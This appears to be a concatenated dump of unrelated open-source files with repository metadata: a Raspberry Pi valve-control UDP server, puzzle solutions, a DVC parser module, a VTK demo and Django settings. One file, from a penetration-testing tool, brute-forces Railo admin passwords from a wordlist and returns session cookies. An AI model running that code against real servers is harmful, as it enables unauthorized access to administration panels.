5,2732035,55263013,38745197,92247105,93747504,13804565,27072958,53722003,2136677,8069353,82320526,26246446,72853427,82415854,70075207,80982516,15440131,60667035,40603492,45092460,81771311,99994849,48021695,56796566,70814389,21414061,50012622,43335581,79984592,1983318,6044527,35232979,9762684,97306076,27480084,3510188,63626993,7069394,57232192,65763670,15138748,92069070,44526469,40508527,27001276,14601676,21491043,42441407,75268711,14610888,40050219,9556375,67122089,88071914,66352941,37936478,62002327,16365563,81272059,94503271,70865233,39832938,29736251,33144269,37139014,9732687,89170810,53282360,16802082,46403002,19046030,84457182,90988424,63572499,24965709,17989701,30690528,98973104,12947460,5959239,13583992,52997680,68031966,80706081,93585946,34384907,71158911,8104626,3266822,52430971,2607897,26648408,44780261,32344148,59792677,34435628,42076836,48963487,87717988,11395270,47882841,59280370,95852452,91387618,75369222,20818161,61893671,6059750,19791265,74841131,64535341,85891610,80355163,32567308,19114043,26457462,19468567,42789307,34562088,75251742,95220278,37169985,1900150,92516891,22030486,14209179,26952519,16623674,15689019,67186859,28018944,63571860,26467230,23871396,54959478,1836452,97205909,16853149,60412554,69513526,44210633,24947895,55405136,77082148,10031555,27035532,56055962,82016475,69824839,90618050,57268217,17561469,80304388,11684719,10078360,2334874,78410250,89547232,71474900,94099269,56734091,99493844,10187482,35717673,23365240,65146960,37554125,73087501,34516462,50483031,42601027,31243447,27947279,50522516,60841947,37978834,77558048,16897910,19995309,47382887,60032312,29779878,17460708,40336700,93980949,80055420,95187926,72391200,69602652,66662826,19006821,78853096,66156670,29194303,14570769,42038262,46857616,4641247,15125763,33890430,55124278,57726791,65133877,83071557,8249307,78492176,73566744,38323707,95390086,46078405,38222946,55422399,75858284,55683654,95759099,22355585,35739074,43463378,47263137,57858079,10126204,66269959,89227527,76282875,47
980614,3798296,70837489,94838230,60955895,85963253,28728660,68596526,96206396,46378889,4184435,56972055,24871066,77751179,95295762,20261152,76345937,33518708,28199903,4720573,89202362,76475355,27076158,77457788,19938733,26855648,87832219,30064937,93125607,77059746,58864164,41106221,33374395,82218006,88460804,94330290,68181259,69705816,15443168,16904007,16084706,19627604,73876062,93472124,49895135,69171824,66249628,26241072,2690532,94449532,83477997,44409246,23441239,10554156,74383386,43379972,37409804,14731958,25961261,83051763,91791704,37341778,76674336,77682451,19559784,65135140,72012742,40257395,34840957,39972262,57161402,3442015,12116218,31037464,96914139,62011354,52725640,63163767,40768778,55416172,10129651,24246776,52341770,33570890,87317284,26725156,29467214,77243440,41457114,55428476,60295203,85765171,45286606,36969539,63447622,64846390,54621032,87976716,57620137,41978341,27948979,14781539,45420356,40065197,98335355,94850847,54592903,51060995,58014614,47878034,58993519,20660618,72124810,11335289,54231508,11958446,90576797,83698723,89201886,84550264,91643551,2013441,22831787,36930157,38982980,86279409,54292899,46120364,26772478,11913036,40615057,7237809,79210927,38551765,99819358,77546282,33402612,54412262,81123629,43933579,2290296,40117148,64594197,26931458,3968789,18825705,38889904,94545586,55040780,80608142,31612202,46684331,82621583,54443989,83614488,74120915,40723399,90423739,20241280,20012229,2336775,60856337,27250038,34064054,99408103,27069396,11610336,85327067,33998010,45250317,29260646,88804658,85367465,46371195,15736116,89336254,17713253,7142372,36398193,72754033,87750514,68010395,19438365,70372097,22454385,3052853,44493013,15694136,93476593,17250645,35706365,48329720,30623334,15472755,82393775,82547789,95058503,46520463,20391209,29056514,91770781,2168207,70377524,29654598,48539403,38629993,71507205,66252656,45772365,7905398,39006689,86039232,75915793,58445054,8927681,98370178,14014260,5937046,66580666,60007205,75704043,2287031,60853277,6327378,7027
6138,95763404,41391519,65334642,42283868,61782728,46907508,86571001,63950936,17285032,68741951,12490339,55915025,40249156,31259347,54203743,670906,70266036,92759327,76586700,81227443,1687008,27473230,47758055,7624055,94053897,60281612,35844450,48857280,21134889,42171828,71649771,69414646,36079700,36984413,64214866,97862428,36408273,3302219,61813364,6209657,72044170,26820055,14641035,64809679,58079402,68844778,65480585,80861791,61604105,94583637,14605586,15807465,22056868,62363641,75947872,68627117,75161605,11792323,70000749,96296494,6480503,41650520,18227492,42560203,31151285,82442358,40422632,67559558,85744577,54752348,26285568,10305100,81572404,40926603,75114779,92168158,62287733,40595364,73029949,76408190,35179002,87635535,92215655,9752222,2515528,68163528,78379339,77677133,32472203,48380088,26489980,38952706,90030609,44717472,81512910,73698246,27159831,74451894,41257805,65420760])
print(time.time()-a,list3)
# list1=[1,5,6,4]
# print(min(list1[1:3])) | [
"[email protected]"
] | |
7b1f66dd10d8d19462a808b9915411777c07b644 | e1292fb9f2b359f71fbc54a4eb6ae4cf0c1ff51d | /machines/rasppi32/socket_server.py | 18c67fe41ecbe2ebc0ace9dc89691c92450be8f2 | [] | no_license | JNRiedel/PyExpLabSys | 879d5c6bf552e89134629f0c6ca011af67937c3d | b69daaa9c932b9264d9f731cc3f2091f31f5d36e | refs/heads/master | 2020-04-08T08:45:17.466865 | 2014-08-22T11:06:24 | 2014-08-22T11:06:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,797 | py | """ Socket server for valve-control box """
import time
import SocketServer
import wiringpi2 as wp
class MyUDPHandler(SocketServer.BaseRequestHandler):
def handle(self):
received_data = self.request[0].strip()
data = "test"
socket = self.request[1]
if received_data == "read":
print "read_all"
data = ''
for i in range(0, 20):
data += str(wp.digitalRead(i))
for i in range(0, 9):
if (received_data[0:11] == "set_state_" + str(i + 1)):
val = received_data[11:].strip()
if val == '0':
wp.digitalWrite(i, 0)
data = "ok"
if val == '1':
wp.digitalWrite(i, 1)
data = "ok"
for i in range(9, 20):
if (received_data[0:12] == "set_state_" + str(i + 1)):
val = received_data[12:].strip()
if val == '0':
wp.digitalWrite(i, 0)
data = "ok"
if val == '1':
wp.digitalWrite(i, 1)
data = "ok"
socket.sendto(data, self.client_address)
if __name__ == "__main__":
    wp.wiringPiSetup()
    time.sleep(1)  # give wiringPi a moment before driving the pins
    for index in range(0, 21):  # configure GPIO pins 0-20 as outputs, all low
        wp.pinMode(index, 1)
        wp.digitalWrite(index, 0)
    # Now that all output are low, we can open main safety output (pin 20)
    wp.digitalWrite(20, 1)
    # NOTE(review): this drives every pin (including pin 20 again) high --
    # presumably the valves' intended power-on state; confirm against the
    # hardware wiring.
    for index in range(0, 21):  # Set GPIO pins to output
        wp.digitalWrite(index, 1)
    HOST, PORT = "10.54.7.32", 9999 # Rasppi33
    server = SocketServer.UDPServer((HOST, PORT), MyUDPHandler)
    server.serve_forever()  # blocks; one datagram handled at a time
| [
"[email protected]"
] | |
18764b8e0e245a262c3d95f37922342280da279e | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/AtCoder/agc015/B/4420123.py | e240646ff0645ed09389907878e7f5bc4ba5d2a1 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 158 | py | s = input()
# For each position, every run visits n-1 steps plus the extra walk that
# depends on the direction at that cell ('U' walks back up i steps,
# otherwise n-1-i steps down).
n = len(s)
ans = 0
for idx, ch in enumerate(s):
    ans += (n - 1) + (idx if ch == "U" else n - 1 - idx)
print(ans)
"[email protected]"
] | |
3acd29f1a10016eb1f86cb5cf195ad30bb94dd36 | e79de9c9def60b0f814ab0625a2eb8bce3428ddd | /challenges/own/operas/operas_solution.py | 0f21f23d8e6186991dd3ca538f90015a1629a287 | [] | no_license | mh70cz/py_old | a80e2140a279541c3639f89df70fadad34f7df0f | 1af878cfbff24e5c6d39219c2c4faebd5a12f0c4 | refs/heads/master | 2022-04-05T15:07:10.840387 | 2020-01-13T18:39:50 | 2020-01-13T18:39:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,202 | py | """
For two given composers find operas (one of composers is the author)
at which premiere both could have been together (i.e. they both had to be alive).
Just a theoretical possibility of presence is considered
"""
from datetime import datetime
# Composer registry: key -> (full name, birth date, death date).
# Dates are "%d %B %Y" strings parsed by _get_date below.
composers = {
    "beethoven": ("Ludwig van Beethoven", "17 December 1770", "26 March 1827"),
    "wagner": ("Richard Wagner", "22 May 1813", "13 February 1883"),
    "verdi": ("Giuseppe Verdi", "9 October 1813", "27 January 1901"),
    "mozart": ("Wolfgang Amadeus Mozart", "27 January 1756", "5 December 1791"),
}
# Opera premieres: (composer key, title, premiere date).
# Note: some premieres are posthumous (e.g. Wagner's "The Fairies", 1888);
# operas_both_at_premiere filters those out via the composer's death date.
operas = [
    ("mozart", "Apollo and Hyacinth", "13 May 1767"),
    ("mozart", "Marriage of Figaro", "1 May 1786"),
    ("mozart", "Don Giovanni", "29 October 1787"),
    ("mozart", "Così fan tutte", "6 January 1790"),
    ("mozart", "The Clemency of Titus", "6 September 1791"),
    ("mozart", "The Magic Flute", "30 September 1791"),
    ("wagner", "The Fairies", "29 June 1888"),
    ("wagner", "Rienzi", "20 October 1842"),
    ("wagner", "The Flying Dutchman", "2 January 1843"),
    ("wagner", "Tannhäuser", "19 October 1845"),
    ("wagner", "Lohengrin", "28 August 1850"),
    ("wagner", "The Rhinegold", "22 September 1869"),
    ("wagner", "The Valkyrie", "26 June 1870"),
    ("wagner", "Siegfried", "16 August 1876"),
    ("wagner", "Twilight of the Gods", "17 August 1876"),
    ("wagner", "Tristan and Isolde", "10 June 1865"),
    ("wagner", "The Master-Singers of Nuremberg", "21 June 1868"),
    ("wagner", "Parsifal", "26 July 1882"),
    ("beethoven", "Fidelio", "20 November 1805"),
    ("verdi", "Nabucco", "9 March 1842"),
    ("verdi", "Ernani", "9 March 1844"),
    ("verdi", "Macbeth", "14 March 1847"),
    ("verdi", "Il corsaro", "25 October 1848"),
    ("verdi", "Rigoletto", "11 March 1851"),
    ("verdi", "La traviata", "6 March 1853"),
    ("verdi", "Aroldo", "16 August 1857"),
    ("verdi", "Macbeth", "21 April 1865"),
    ("verdi", "Don Carlos", "11 March 1867"),
    ("verdi", "Aida", "24 December 1871"),
    ("verdi", "Otello", "5 February 1887"),
    ("verdi", "Falstaff", "9 February 1893"),
]
def _get_date(date_str):
return datetime.date(datetime.strptime(date_str, "%d %B %Y"))
def operas_both_at_premiere(guest, composer, operas=operas):
    """List operas by `composer` whose premieres `guest` could have attended.

    An opera qualifies when its premiere falls strictly within the guest's
    lifetime and strictly before the composer's death (so posthumous
    premieres are excluded).

    Args:
        guest (str): key into `composers`; the visitor, not the author.
        composer (str): key into `composers`; the opera's author.
        operas (list): (author key, title, premiere date) triples.

    Returns:
        A list of opera titles.

    Raises:
        ValueError: if either key is not in `composers`.
    """
    if guest not in composers:
        raise ValueError("guest is not in composers")
    if composer not in composers:
        raise ValueError("composer is not in composers")
    guest_lived_from = _get_date(composers[guest][1])
    guest_lived_to = _get_date(composers[guest][2])
    composer_lived_to = _get_date(composers[composer][2])
    titles = []
    for author, title, premiere_str in operas:
        if author != composer:
            continue
        premiere = _get_date(premiere_str)
        if guest_lived_from < premiere < guest_lived_to \
                and premiere < composer_lived_to:
            titles.append(title)
    return titles
| [
"[email protected]"
] | |
a643359cdc06e3dad758fb3aebf4acc8e8ccfee6 | 5e48c355308cfe3fe84835f3d56218a53f7968cd | /dvc/parsing/__init__.py | b173de4384e38b7898d811d2d2e19cb55d2b293d | [
"Apache-2.0"
] | permissive | imhardikj/dvc | 97b6637f75d90e9f3f708211aec07e3da2fa205f | 911534116e4f870f87b05caf2bed38e105a205ad | refs/heads/master | 2023-01-05T04:01:46.308634 | 2020-10-29T09:01:34 | 2020-10-29T09:01:34 | 264,737,803 | 0 | 0 | Apache-2.0 | 2020-05-17T19:08:07 | 2020-05-17T19:08:06 | null | UTF-8 | Python | false | false | 3,764 | py | import logging
import os
from collections import defaultdict
from copy import deepcopy
from itertools import starmap
from typing import TYPE_CHECKING
from funcy import first, join
from dvc.dependency.param import ParamsDependency
from dvc.path_info import PathInfo
from dvc.utils.serialize import dumps_yaml
from .context import Context
from .interpolate import resolve
if TYPE_CHECKING:
from dvc.repo import Repo
logger = logging.getLogger(__name__)

# Top-level keys recognized in a dvc.yaml stage definition.
STAGES_KWD = "stages"
USE_KWD = "use"
VARS_KWD = "vars"
WDIR_KWD = "wdir"
# Default parameters file name, reused from ParamsDependency (params.yaml).
DEFAULT_PARAMS_FILE = ParamsDependency.DEFAULT_PARAMS_FILE
PARAMS_KWD = "params"
class DataResolver:
    """Resolves parametrized stage definitions from a dvc.yaml dict.

    Builds a global interpolation Context from the file named by `use`
    (default params.yaml, if it exists) merged with inline `vars`, then
    resolves each stage against a per-stage clone of that context.
    """

    def __init__(self, repo: "Repo", wdir: PathInfo, d: dict):
        # File to seed the global context from; `use` overrides params.yaml.
        to_import: PathInfo = wdir / d.get(USE_KWD, DEFAULT_PARAMS_FILE)
        vars_ = d.get(VARS_KWD, {})
        vars_ctx = Context(vars_)
        if os.path.exists(to_import):
            self.global_ctx_source = to_import
            self.global_ctx = Context.load_from(repo.tree, str(to_import))
        else:
            self.global_ctx = Context()
            self.global_ctx_source = None
            logger.debug(
                "%s does not exist, it won't be used in parametrization",
                to_import,
            )
        # Inline `vars` take precedence over values loaded from the file.
        self.global_ctx.merge_update(vars_ctx)
        self.data: dict = d
        self.wdir = wdir
        self.repo = repo

    def _resolve_entry(self, name: str, definition):
        """Resolve one stage against a fresh clone of the global context."""
        context = Context.clone(self.global_ctx)
        return self._resolve_stage(context, name, definition)

    def resolve(self):
        """Return the dvc.yaml data with all stage templates resolved."""
        stages = self.data.get(STAGES_KWD, {})
        # join() merges the per-stage single-entry dicts into one mapping.
        data = join(starmap(self._resolve_entry, stages.items()))
        logger.trace("Resolved dvc.yaml:\n%s", dumps_yaml(data))
        return {STAGES_KWD: data}

    def _resolve_stage(self, context: Context, name: str, definition) -> dict:
        """Resolve a single stage definition; returns {name: resolved_dict}."""
        definition = deepcopy(definition)
        wdir = self._resolve_wdir(context, definition.get(WDIR_KWD))
        if self.wdir != wdir:
            logger.debug(
                "Stage %s has different wdir than dvc.yaml file", name
            )
        contexts = []
        params_yaml_file = wdir / DEFAULT_PARAMS_FILE
        # Avoid loading the same file twice when the stage wdir's
        # params.yaml is already the global context source.
        if self.global_ctx_source != params_yaml_file:
            if os.path.exists(params_yaml_file):
                contexts.append(
                    Context.load_from(self.repo.tree, str(params_yaml_file))
                )
            else:
                logger.debug(
                    "%s does not exist for stage %s", params_yaml_file, name
                )
        # Stage-level `params:` entries given as {file: [keys]} dicts also
        # contribute to the interpolation context.
        params_file = definition.get(PARAMS_KWD, [])
        for item in params_file:
            if item and isinstance(item, dict):
                contexts.append(
                    Context.load_from(self.repo.tree, str(wdir / first(item)))
                )
        context.merge_update(*contexts)
        logger.trace(  # pytype: disable=attribute-error
            "Context during resolution of stage %s:\n%s", name, context
        )
        # track() records which context keys the interpolation touched so
        # they can be reported as stage params below.
        with context.track():
            stage_d = resolve(definition, context)
        params = stage_d.get(PARAMS_KWD, []) + self._resolve_params(
            context, wdir
        )
        if params:
            stage_d[PARAMS_KWD] = params
        return {name: stage_d}

    def _resolve_params(self, context: Context, wdir):
        """Group tracked context keys by source file, relative to wdir."""
        tracked = defaultdict(set)
        for src, keys in context.tracked.items():
            tracked[str(PathInfo(src).relative_to(wdir))].update(keys)
        return [{file: list(keys)} for file, keys in tracked.items()]

    def _resolve_wdir(self, context: Context, wdir: str = None) -> PathInfo:
        """Interpolate the stage's wdir (if any) and anchor it at self.wdir."""
        if not wdir:
            return self.wdir
        wdir = resolve(wdir, context)
        return self.wdir / str(wdir)
| [
"[email protected]"
] | |
ac3f36b00c738fcffba08b38b22ace5d60c3a19f | 2656f92d8329bc1b28188802badc7b3a945fa978 | /src/platform/railo/authenticate.py | 8ee7b6a90b019f5aa138fc25923c9a2625b4583e | [
"MIT"
] | permissive | koutto/clusterd | 81828698574bc7301cd4eb0ad87d3115ddf74612 | 93db0a50210dcc6147c3122a539104a36e92f02b | refs/heads/master | 2020-05-03T17:51:55.430955 | 2019-03-31T23:20:22 | 2019-03-31T23:20:22 | 178,751,876 | 2 | 1 | MIT | 2019-03-31T23:04:14 | 2019-03-31T23:04:13 | null | UTF-8 | Python | false | false | 2,588 | py | from src.platform.railo.interfaces import RINTERFACES
from requests.utils import dict_from_cookiejar
from collections import OrderedDict
from sys import stdout
from log import LOG
import state
import utility
def _auth(pswd, url, title):
    """ Support auth for both the web and server interfaces.

    Posts the login form to `url` with the password field matching the
    interface `title`; on success returns the session cookies as a dict,
    otherwise returns None implicitly.
    """
    data = OrderedDict([
        ("lang", "en"),
        ("rememberMe", "yyyy"),
        ("submit", "submit")
    ])
    # Railo uses a different password field name per admin interface.
    if title is RINTERFACES.WEB:
        data["login_passwordweb"] = pswd
    elif title is RINTERFACES.SRV:
        data['login_passwordserver'] = pswd
    response = utility.requests_post(url, data=data)
    # BUGFIX: compare the status code with ==, not `is`. `is 200` only
    # worked because CPython caches small integers; it is an identity
    # check and not guaranteed by the language.
    if response.status_code == 200 and "login.login_password" not in response.content:
        utility.Msg("Successfully authenticated with '%s'" % pswd, LOG.DEBUG)
        return dict_from_cookiejar(response.cookies)
def checkAuth(ip, port, title):
    """ Railo doesn't have usernames, so we only care about passwords.

    Tries the user-supplied password (state.usr_auth) first; otherwise
    brute forces from state.bf_wordlist. Returns the session cookie dict
    on success, None otherwise.
    """
    url = None
    if title is RINTERFACES.WEB:
        url = "http://{0}:{1}/railo-context/admin/web.cfm".format(ip, port)
    elif title is RINTERFACES.SRV:
        url = "http://{0}:{1}/railo-context/admin/server.cfm".format(ip, port)
    else:
        utility.Msg("Interface %s not supported yet." % title, LOG.DEBUG)
        return
    if state.usr_auth:
        # check with given auth; handle both cases of "default" and ":default"
        # NOTE(review): split(":") with a 2-tuple unpack will raise if the
        # password itself contains a colon.
        if ':' in state.usr_auth:
            (_, pswd) = state.usr_auth.split(":")
        else:
            pswd = state.usr_auth
        return _auth(pswd, url, title)
    # Brute-force once per run (hasbf guards against re-running per interface).
    if state.bf_wordlist and not state.hasbf:
        state.hasbf = True
        wordlist = []
        with open(state.bf_wordlist, "r") as f:
            # decode() implies Python 2 byte strings; non-ASCII is dropped.
            wordlist = [x.decode("ascii", "ignore").rstrip() for x in f.readlines()]
        utility.Msg("Brute forcing %s with %d passwords..." % (state.bf_user,
                                          len(wordlist)), LOG.DEBUG)
        try:
            for (idx, word) in enumerate(wordlist):
                # \r + ANSI green: rewrite the progress line in place.
                stdout.flush()
                stdout.write("\r\033[32m [%s] Brute forcing password for %s [%d/%d]\033[0m"
                                % (utility.timestamp(), state.bf_user, idx+1, len(wordlist)))
                cook = _auth(word, url, title)
                if cook:
                    print ''
                    utility.Msg("Successful login with %s" % word, LOG.SUCCESS)
                    return cook
            print ''
        except KeyboardInterrupt:
            # Allow the operator to abort the brute force without a traceback.
            pass
| [
"[email protected]"
] | |
668781a6f78564088417314c29bba0050a82a1a5 | 8d55d3a52ed6dc8111801cea9c7c9d0a84be736b | /src/1392.longest-happy-prefix.py | 3b5ddbab31d9da69b9465e8818f5c3b68d1a952b | [] | no_license | mic0ud/Leetcode-py3 | 2a23270034ec470571e57c498830b93af813645f | 61fabda324338e907ce3514ae8931c013b8fe401 | refs/heads/master | 2022-12-26T11:52:31.666395 | 2020-09-27T19:27:10 | 2020-09-27T19:27:10 | 297,135,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,748 | py | #
# @lc app=leetcode id=1392 lang=python3
#
# [1392] Longest Happy Prefix
#
# https://leetcode.com/problems/longest-happy-prefix/description/
#
# algorithms
# Hard (39.14%)
# Likes: 191
# Dislikes: 15
# Total Accepted: 8K
# Total Submissions: 20.1K
# Testcase Example: '"level"'
#
# A string is called a happy prefix if is a non-empty prefix which is also a
# suffix (excluding itself).
#
# Given a string s. Return the longest happy prefix of s .
#
# Return an empty string if no such prefix exists.
#
#
# Example 1:
#
#
# Input: s = "level"
# Output: "l"
# Explanation: s contains 4 prefix excluding itself ("l", "le", "lev", "leve"),
# and suffix ("l", "el", "vel", "evel"). The largest prefix which is also
# suffix is given by "l".
#
#
# Example 2:
#
#
# Input: s = "ababab"
# Output: "abab"
# Explanation: "abab" is the largest prefix which is also suffix. They can
# overlap in the original string.
#
#
# Example 3:
#
#
# Input: s = "leetcodeleet"
# Output: "leet"
#
#
# Example 4:
#
#
# Input: s = "a"
# Output: ""
#
#
#
# Constraints:
#
#
# 1 <= s.length <= 10^5
# s contains only lowercase English letters.
#
#
#
# @lc code=start
class Solution:
    def longestPrefix(self, s: str) -> str:
        """Return the longest proper prefix of s that is also a suffix."""
        table = self.suffix_prefix(s)
        return s[:table[-1]]

    def suffix_prefix(self, s) -> [int]:
        """KMP failure table: table[j] is the length of the longest proper
        prefix of s[:j+1] that is also its suffix."""
        table = [0]
        match_len = 0
        for ch in s[1:]:
            # Fall back through shorter borders until one extends with ch.
            while match_len > 0 and ch != s[match_len]:
                match_len = table[match_len - 1]
            if ch == s[match_len]:
                match_len += 1
                table.append(match_len)
            else:
                table.append(0)
        return table
# @lc code=end
if __name__ == '__main__':
    s = Solution()
    # Ad-hoc smoke calls; return values are discarded (no prints/asserts).
    s.longestPrefix("levele")
    s.longestPrefix("leetcodeleet")
| [
"[email protected]"
] | |
0b0904c3cb0fa4f9689e280d90bb751078b85fb6 | 3474b315da3cc5cb3f7823f19a18b63a8da6a526 | /scratch/KRAMS/src/apps/scratch/faezeh/lab/cell_lab/shell.py | 93472192968f601cf1db0bcfe727b1175ea20d64 | [] | no_license | h4ck3rm1k3/scratch | 8df97462f696bc2be00f1e58232e1cd915f0fafd | 0a114a41b0d1e9b2d68dbe7af7cf34db11512539 | refs/heads/master | 2021-01-21T15:31:38.718039 | 2013-09-19T10:48:24 | 2013-09-19T10:48:24 | 29,173,525 | 0 | 0 | null | 2015-01-13T04:58:57 | 2015-01-13T04:58:56 | null | UTF-8 | Python | false | false | 3,462 | py | '''
(C)2004 ORFEUS
This is the default python module file. It has been generated
by the modtree administrator
Import the generated Python module in order to
- initialize the required modules and
- load the compiled module extension library of this module
'''
# Here you can add your own code ...
#!/usr/bin/env python
"""A simple example demonstrating how one can use numpy arrays
transparently with TVTK.
"""
# Author: Prabhu Ramachandran and Eric Jones
# Copyright (c) 2004-2007, Enthought, Inc.
# License: BSD Style.
from enthought.tvtk.api import tvtk
from numpy import array
# Per-point scalar data: one temperature value for each of the 8 points of
# the quadratic quad below (only point 1 is non-zero, so the colour map
# shows a hot spot at that corner).
temperature = tvtk.DoubleArray()
temperature.insert_next_value(0.)
temperature.insert_next_value(20.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
temperature.insert_next_value(0.)
#temp_array.append(temp2)
### TVTK PIPELINE
# create a render window and hand it the renderer
render_window = tvtk.RenderWindow(size=(400,400))
# create a renderer
renderer = tvtk.Renderer(background=(0.839216, 0.839216, 0.839216))
render_window.add_renderer(renderer)
# create interactor and hand it the render window
# This handles mouse interaction with window.
interactor = tvtk.RenderWindowInteractor(render_window=render_window)
# Geometry: 4 corner points (ids 0-3) followed by 4 edge mid-points
# (ids 4-7) of a unit square in the z=0 plane -- the ordering required by
# QuadraticQuad. Earlier experiments are kept commented out.
points_arr = tvtk.Points()
#points_arr.insert_point(0, -1, -1, 0)
#points_arr.insert_point(1, 1, -1, 0)
#points_arr.insert_point(2, 1, 1, 0)
#points_arr.insert_point(3, -1, 1, 0)
#points_arr.insert_point(0, 0., 0., 0.)
#points_arr.insert_point(1, 0.5, 0., 1.)
#points_arr.insert_point(2, 1., 0., 0.)
#points_arr.insert_point(3, 1., 0.5, 0.)
#points_arr.insert_point(4, 1, 1., 0.)
#points_arr.insert_point(5, 0.5, 1, 1.)
#points_arr.insert_point(6, 0, 1., 0.)
#points_arr.insert_point(7, 0., 0.5, 0.)
points_arr.insert_point(0, 0., 0., 0.)
points_arr.insert_point(1, 1., 0., 0.)
points_arr.insert_point(2, 1., 1., 0.)
points_arr.insert_point(3, 0., 1., 0.)
points_arr.insert_point(4, 0.5, 0., 0.)
points_arr.insert_point(5, 1, 0.5, 0.)
points_arr.insert_point(6, 0.5, 1., 0.)
points_arr.insert_point(7, 0., 0.5, 0.)
#points_arr.insert_point(4, 1.5, 0., 0.)
#points_arr.insert_point(5, 2, 0.5, 0.)
#points_arr.insert_point(6, 1.5, 1., 0.)
#points_arr.insert_point(7, 1., 0.5, 0.)
# One 8-node quadratic quad cell whose point ids map 1:1 onto points_arr.
quad = tvtk.QuadraticQuad()
quad._get_point_ids().set_id(0, 0)
quad._get_point_ids().set_id(1, 1)
quad._get_point_ids().set_id(2, 2)
quad._get_point_ids().set_id(3, 3)
quad._get_point_ids().set_id(4, 4)
quad._get_point_ids().set_id(5, 5)
quad._get_point_ids().set_id(6, 6)
quad._get_point_ids().set_id(7, 7)
#define array
polys = tvtk.CellArray()
#connect a cell to the array
# NOTE(review): polys is built but never attached to the mesh below --
# presumably left over from the commented PolyData variant.
polys.insert_next_cell(quad)
# Create a mesh from the data created above.
#mesh = tvtk.PolyData(points = points_arr,polys = polys)
mesh = tvtk.UnstructuredGrid()
mesh.insert_next_cell(quad.cell_type,quad._get_point_ids() )
mesh.points = points_arr
mesh.point_data.scalars = temperature
# Set the mapper to scale temperature range
# across the entire range of colors
#mapper = tvtk.PolyDataMapper(input=mesh)
mapper = tvtk.DataSetMapper(input=mesh)
# Create mesh actor for display
actor = tvtk.Actor(mapper=mapper)
actor.property.color=(1, 0, 0)
actor.property.point_size=(200.)
actor.property.line_width=(200.)
# Now add the actors to the renderer and start the interaction.
renderer.add_actor(actor)
interactor.initialize()
interactor.start()
| [
"Axel@Axel-Pc"
] | Axel@Axel-Pc |
70476e212daa4321863e86fabbc6752a86a59967 | d5219de4d3e4bef5c8c71e209158dd92d4f8a011 | /project/config/settings/common.py | a1d862bdb54494fd64d57ad3cdfcf6166a07ffa9 | [
"MIT"
] | permissive | ilmoeuro/asylum | 1932de32ae6db6b34d1609775d5ff9037130fe02 | 88d48d59cba58738bf141142bae7d1182cf4d5e7 | refs/heads/master | 2021-01-24T23:13:09.090463 | 2015-11-27T21:56:21 | 2015-11-27T21:56:21 | 47,000,716 | 1 | 0 | null | 2015-11-27T21:53:40 | 2015-11-27T21:53:40 | null | UTF-8 | Python | false | false | 8,123 | py | # -*- coding: utf-8 -*-
"""
Django settings for asylum project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import os.path
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)
APPS_DIR = ROOT_DIR.path('asylum')
env = environ.Env()
# If the project root contains a .env file, read it
if os.path.isfile(str(ROOT_DIR + '.env')):
environ.Env.read_env(str(ROOT_DIR + '.env'))
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
)
# Apps specific for this project go here.
LOCAL_APPS = (
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': 'asylum.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""Anders Innovations""", '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db("DATABASE_URL", default="postgres:///asylum"),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/Helsinki'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
